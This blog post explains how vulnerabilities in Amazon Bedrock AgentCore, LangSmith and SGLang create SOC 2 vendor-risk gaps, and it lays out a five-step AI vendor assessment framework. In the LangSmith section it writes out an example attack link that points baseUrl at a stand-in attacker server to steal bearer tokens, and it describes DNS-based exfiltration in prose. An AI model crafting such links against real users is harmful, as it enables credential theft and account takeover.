Blog

Bedrock, LangSmith, SGLang: Three AI Platform Vulns That Expose Your Compliance Gaps

Critical vulnerabilities in Amazon Bedrock, LangSmith, and SGLang reveal why AI vendor risk management is now a SOC 2 and EU AI Act requirement.

Three of the most popular AI development platforms disclosed serious security vulnerabilities this week. Amazon Bedrock AgentCore, LangSmith, and SGLang each had flaws that allow data exfiltration, account takeover, or remote code execution. If you're a startup building on any of these tools, the security implications are obvious. The compliance implications are what I want to talk about, because most teams aren't thinking about those yet.

Here's the uncomfortable question: does your SOC 2 vendor risk assessment cover your AI platform stack? Not your cloud provider. Not your database host. Your LLM orchestration layer, your model serving framework, your trace and evaluation tooling. The platforms where your prompts, training data, customer queries, and model outputs actually live.

For 67% of CISOs, the answer is no. A survey published alongside these disclosures found that two-thirds of security leaders have limited visibility into how AI is being used across their organization. Only 11% have AI-specific security tools. Three-quarters are still relying on legacy security controls that weren't designed for AI workloads.

These numbers line up with what I see in practice. Startups are moving fast on AI product development and treating the AI vendor stack as an implementation detail rather than a compliance-critical dependency. This week's disclosures show why that's a problem.

What actually happened

Let me break down each vulnerability and why it matters for your compliance posture.

Amazon Bedrock AgentCore: your "isolated" sandbox talks to the internet

BeyondTrust discovered that Amazon Bedrock's AgentCore Code Interpreter - the sandbox environment where your AI agents execute code - permits outbound DNS queries even when configured with "no network access." That sounds like a minor misconfiguration. It isn't.

DNS is enough. An attacker can establish a bidirectional command-and-control channel using nothing but DNS queries and responses. They encode commands in DNS A record lookups, execute them inside the sandbox, and exfiltrate results as DNS subdomain queries. The sandbox has no network access in the traditional sense - no HTTP, no TCP connections to external hosts - but DNS slips through.

The CVSS score is 7.5, which honestly undersells the impact. The data at risk depends on whatever IAM role the Code Interpreter assumes. In many deployments, that includes S3 bucket contents, AWS resource access, and any data the agent is processing on behalf of your customers.

The fix is to migrate from sandbox mode to VPC mode for complete network isolation and implement DNS firewalls to filter outbound DNS traffic. But the compliance question is: did your vendor risk assessment catch this? Did you know your AI sandbox had a network isolation gap? If the answer is no, your vendor assessment process has a gap that goes beyond this single vulnerability.

LangSmith: one crafted link steals your entire AI trace history

Miggo Security found CVE-2026-25750 in LangSmith, the observability and evaluation platform from LangChain. The vulnerability is a URL parameter injection through an unvalidated baseUrl parameter, and it's exactly as bad as it sounds.

An attacker crafts a link like smith.langchain.com/studio/?baseUrl=https://attacker-server.com and sends it to a LangSmith user. When the victim clicks, LangSmith redirects their bearer token, user ID, and workspace ID to the attacker's server. With those credentials, the attacker gets access to the victim's complete AI trace history - every prompt, every response, every evaluation run.

Here's where it gets compliance-critical: LangSmith traces often contain production data. SQL queries. CRM records. Customer conversations. Proprietary source code. Whatever your AI application processes, LangSmith probably has a copy of it in the trace logs. A single stolen bearer token gives an attacker access to all of that data.

The CVSS score is 8.5. LangChain fixed it in version 0.12.71 back in December 2025. But if you're running a self-hosted LangSmith instance, you need to verify you've patched. And either way, the question for your compliance team is: was LangSmith in your vendor inventory? Did you assess what data flows through it? Did you evaluate what happens when LangSmith credentials are compromised?

SGLang: three unpatched RCE vulnerabilities via pickle deserialization

This is the worst of the three. Igor Stepansky at Orca Security found three separate remote code execution vulnerabilities in SGLang, the open-source LLM serving framework from the LMSYS team. All three exploit unsafe pickle deserialization - pickle.loads() and pickle.load() called without authentication or validation.

  • CVE-2026-3059 (CVSS 9.8): Unauthenticated RCE via the ZeroMQ broker
  • CVE-2026-3060 (CVSS 9.8): Unauthenticated RCE via the disaggregation module
  • CVE-2026-3989 (CVSS 7.8): Insecure deserialization in the crash dump replay utility

An attacker who can reach the ZeroMQ ports can send a malicious pickle file and get full code execution on the host. No authentication required. No exploitation complexity. Just send the payload.

As of this writing, all three are unpatched. There's no fix available. If you're running SGLang in production, your only mitigation is network segmentation - restricting service access to trusted networks and monitoring for unexpected connections.

For compliance purposes, this is an active, known, unpatched critical vulnerability in a production dependency. Your SOC 2 auditor is going to ask how you're managing this risk. "We didn't know" is not an acceptable answer.

Why your vendor risk assessment missed this

Most startups I work with have some form of vendor risk assessment. It covers the big platforms: AWS, Google Cloud, their database provider, maybe their CI/CD tooling. But the AI platform stack sits in a blind spot. Here's why.

The AI stack grew bottom-up

Nobody made a centralized decision to adopt LangChain, or SGLang, or any specific model serving framework. An engineer found a tool that solved a problem, integrated it, and shipped. By the time the compliance team learned about it, the tool was in production handling customer data.

This is the same shadow IT problem that created cloud sprawl a decade ago, but it's moving faster. AI development tooling changes month to month. New frameworks appear, get adopted, and become production dependencies before security review processes catch up.

AI tools don't look like traditional vendors

When your procurement team evaluates a vendor, they're thinking about SaaS platforms with enterprise sales teams, SOC 2 reports, and security questionnaires. SGLang is an open-source project. LangSmith has a cloud offering but many teams self-host it. Amazon Bedrock AgentCore is a managed service, but it's consumed as an API feature rather than a standalone vendor relationship.

None of these fit neatly into the traditional vendor assessment workflow. So they get skipped.

The data flow isn't obvious

With a traditional SaaS vendor, the data flow is relatively clear: you send customer data to the platform, the platform processes it, you get results back. With AI tooling, the data flow is more complex.

LangSmith captures traces of every interaction your AI application processes. That means every customer query, every database result, every API response that feeds into your LLM pipeline gets copied into LangSmith's storage. A model serving framework like SGLang processes the actual inference requests - the raw prompts and completions. Bedrock's Code Interpreter executes arbitrary code with access to whatever resources its IAM role permits.

The volume and sensitivity of data flowing through these tools often exceeds what flows through traditional SaaS vendors. But because AI teams think of these as "development tools" rather than "data processors," the data classification step gets missed.

What SOC 2 actually requires

Let me map this to specific SOC 2 trust services criteria, because the requirements aren't ambiguous - they're just not being applied to AI vendors.

CC6.1: Logical and physical access controls

You need to demonstrate that you control access to information and systems. That includes third-party systems that process your data. When LangSmith stores your complete trace history and a URL parameter injection can steal access credentials, that's a CC6.1 gap. You need to show your auditor that you've assessed the access controls on every platform that handles sensitive data, including your AI observability tooling.

CC7.2: Monitoring for anomalous activity

You need to monitor for anomalies across your environment. When Bedrock's sandbox leaks data via DNS and you're not monitoring for DNS-based exfiltration from your AI workloads, that's a CC7.2 gap. I covered the broader runtime monitoring challenge in yesterday's post on AI agent monitoring - the vendor vulnerability angle adds another dimension to the same problem.

CC9.2: Vendor risk management

This is the big one. CC9.2 requires you to assess and manage risks from third-party service providers. The criterion explicitly covers evaluating vendor security controls, monitoring for changes in vendor risk posture, and having contingency plans when vendors have security incidents.

A vendor with three unpatched CVSS 9.8 vulnerabilities is a material risk. Your auditor will want to see how you identified this risk, what compensating controls you implemented, and what your plan is if the vulnerabilities are exploited before patches are available.

Building AI vendor risk into your compliance workflow

Here's the practical framework I use with clients. It's designed for small teams that can't afford a dedicated vendor risk management platform but still need to satisfy SOC 2 requirements.

Step 1: Build your AI vendor inventory

Start by listing every tool in your AI stack that touches data. Not just the ones you're paying for. Include:

Category Examples Data Exposure
Model providers OpenAI, Anthropic, Bedrock, Vertex AI Prompts, completions, embeddings
Orchestration LangChain, LlamaIndex, Haystack Full pipeline data flow
Serving frameworks SGLang, vLLM, TGI, Ollama Raw inference requests
Observability LangSmith, Langfuse, Phoenix Complete trace history
Vector databases Pinecone, Weaviate, Qdrant Embedded document content
Fine-tuning platforms Weights & Biases, MLflow Training data, model weights

For each tool, document: who owns it, what data flows through it, how it's deployed (cloud vs self-hosted), and when it was last reviewed for security.

Step 2: Classify data sensitivity per tool

Not every AI tool handles the same level of sensitive data. Your model provider might only see anonymized prompts if you've built your pipeline correctly. But your observability tool probably captures everything, because that's the point of observability.

Map each tool to a data sensitivity level:

  • Critical: Handles PII, financial data, or credentials (LangSmith traces, fine-tuning datasets)
  • High: Handles proprietary business logic or customer content (model providers, orchestration layers)
  • Medium: Handles internal data or metadata (vector databases with non-sensitive content, experiment tracking)
  • Low: No customer or sensitive data exposure (local development tools, CI/CD for model deployment)

Focus your assessment effort on Critical and High first. This is where the compliance risk lives.

Step 3: Assess vendor security posture

For each Critical and High tool, gather:

  1. Does the vendor have a SOC 2 report? Major cloud providers and established SaaS platforms will. Open-source frameworks won't.
  2. What's their vulnerability disclosure history? Check NVD, GitHub advisories, and security mailing lists. A history of responsible disclosure is a positive signal. Unpatched critical vulns (like SGLang right now) are a red flag.
  3. What's the blast radius of a compromise? If this tool's credentials are stolen, what's the maximum data exposure? The LangSmith vulnerability shows this clearly - a single bearer token exposed the entire trace history.
  4. What's your exit plan? If this vendor has a security incident, how quickly can you switch to an alternative? Can you revoke access within minutes?

For open-source tools, you won't get a SOC 2 report or a security questionnaire response. That's fine. Document the risk, implement compensating controls (network segmentation, access restrictions, monitoring), and show your auditor that you've thought about it. The audit requirement isn't that every vendor has a SOC 2 report. It's that you've assessed and managed the risk. If you're looking for a broader framework for structuring this, my SaaS compliance stack guide walks through how different compliance requirements layer on top of each other.

Step 4: Implement compensating controls

For AI tools that don't meet your security bar, implement compensating controls rather than ripping them out. The practical options:

  • Network segmentation: Run AI infrastructure in isolated network segments. This is your primary defense against the SGLang vulnerabilities - if the ZeroMQ ports aren't reachable from untrusted networks, the RCE risk drops dramatically.
  • DNS filtering: Deploy DNS firewalls on your AI workloads. This directly mitigates the Bedrock AgentCore vulnerability and catches any similar DNS-based exfiltration attempts.
  • Credential rotation: Automate credential rotation for AI platform access. When the LangSmith vulnerability was active, short-lived tokens would have limited the blast radius of a compromise.
  • Data minimization: Don't send more data to AI tools than they need. If your LangSmith traces don't need to capture full customer PII, mask sensitive fields before they enter the trace pipeline. This is the same principle behind the audit-ready LLM architecture I've written about - design the data flow for minimum exposure.
  • Monitoring: Monitor for IOCs specific to these vulnerabilities. Unexpected DNS TXT record lookups from sandbox environments. Unusual API calls from LangSmith service accounts. New connections to ZeroMQ ports.

Step 5: Document and review quarterly

Put it all in writing. Your AI vendor risk register should be a living document that gets reviewed quarterly (at minimum) and updated whenever a new disclosure drops. This week is a good example - three disclosures in one day. Your register should reflect the new risk posture within a week, not whenever you get around to it.

The documentation serves two purposes: it shows your auditor that you're actively managing AI vendor risk, and it gives your engineering team a clear picture of which tools carry compliance obligations. Both matter.

The bigger picture

This week's disclosures aren't an anomaly. They're the beginning of a pattern. AI development tooling is young, fast-moving, and built by teams optimizing for capability rather than security. The same trajectory played out with cloud infrastructure a decade ago and DevOps tooling five years ago. The difference is that AI tools handle more sensitive data earlier in their maturity lifecycle than either of those predecessors.

The 67% of CISOs with limited AI visibility aren't failing because they're incompetent. They're failing because their vendor risk processes were designed for a world where you could enumerate your technology dependencies by looking at procurement contracts. That world is gone. Your AI stack grows by pip install and GitHub stars, and your compliance program needs to keep up.

The startups that treat AI vendor risk as a first-class compliance concern now will have clean audits and credible security postures when the scrutiny intensifies. The ones that wait will be retroactively documenting risk assessments while their auditor asks pointed questions about why three CVSS 9.8 vulnerabilities in a production dependency went unnoticed.

I know which position I'd rather be in.


Keep reading:

Building on AI platforms and need to pass your SOC 2 audit? Let's talk.